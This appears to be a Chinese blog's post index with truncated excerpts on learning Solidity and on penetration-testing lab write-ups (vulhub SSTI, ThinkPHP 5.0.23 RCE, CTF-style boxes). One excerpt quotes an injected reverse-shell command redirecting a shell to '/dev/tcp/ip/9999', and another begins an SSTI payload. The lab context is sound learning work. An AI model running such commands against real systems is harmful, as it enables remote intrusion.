khxzz

摘要： 刚开始学习web3，不知道怎么写好，希望有大佬看到能纠错 第一关是关于闪电贷的 先来看合约 // SPDX-License-Identifier: MIT pragma solidity ^0.8.0; import "@openzeppelin/contracts/token/ERC20/IERC 阅读全文

摘要： 参考 https://solidity-cn.readthedocs.io/zh/develop/types.html#index-20 官方文档 1.类型 solidity 的类型主要来说的话一般是值，引用映射类型 1、值：像整形啊，布尔这类的用来传递参数 2、引用：包括数组跟结构体，占用空间比较 阅读全文

摘要： 实验准备： 下载完成之后，打开靶机，我总是连接不上我的靶机，根本找不到我的靶机ip 先配置一下靶机ip地址 把 ro quiet替换为rw signie init=/bin/bash 然后ctrl+x进入下一步 用ip a查看当前网卡信息 然后编辑网卡信息 nano /etc/network/int 阅读全文

摘要： 学习web3 希望能和大家一起学习 参考资料： https://www.wtf.academy/solidity-start https://github.com/Web3-Club/solidity-by-example_Chinese https://hicoldcat.com/posts/we 阅读全文

摘要： 一、环境准备 启动docker环境 docker-compose up -d 如图 二、漏洞复现 我们先了解一下ssti模板注入， 可以尝试让 ai给我们生成一些payload 然后我们来看看题目 name为用户输入字段，随意输入进行验证， 三、修复 四、漏洞利用： {% for c in []._ 阅读全文

摘要： 一、信息收集 通过nmap扫描发现主机开放 22、80、8000端口 访问80端口，发现一个登录框，如果这里连接不上去的记得添加到host里面 登录框尝试sql注入，但是这里通过收集到默认密码进入后台 二、漏洞利用 发现了一个这个页面 如果提示ssh连接不上，就去天加一下host就可以了，这里我们先 阅读全文

摘要： 分段反向shell 然后还学习到一个新姿势，查了一些资料。首先使用如下命令来创建一个与攻击者的tcp连接，并将标准输入(0)重定向到这个连接，sh是一个子shell的标记，用来在括号内执行命令。 ;`(sh)0>/dev/tcp/ip/9999` 之后执行如下将标准输出(1)和标准错误(2)都重定向 阅读全文

摘要： 一、信息收集 连接上vpn之后，我们拿到了给出来的ip地址 通过nmap扫描发现存在 80 跟22 端口泄露 访问80端口直接访问会出现问题，这时候可能会出现错误，我们修改我们的host 通过dirsearch 扫描目录发现，存在目录泄露点和一个目录遍历点 二、漏洞利用 通过报错页面察觉到是spri 阅读全文

摘要： 在搭建cicd docker 靶场的时候出现这个问题，由于是第一次遇到，就想记录下来 通过各种搜索资料搜索 发现只要安装如下包就没问题 1 apt -y install gnome-keyring 这样做之后，一切都可以 这样就可以了 阅读全文

摘要： 靶场是基于vulhub的靶场 docker-compose up -d 启动靶场 并且漏洞环境是 thinkphp 5.0.23 现在验证漏洞 列出了当前目录文件 可以，验证完了，看到漏洞存在 现在想尝试弹一个shell，开启监听 ok！ bp可以， 但是，查看服务器并未得到shell 不清楚是为什 阅读全文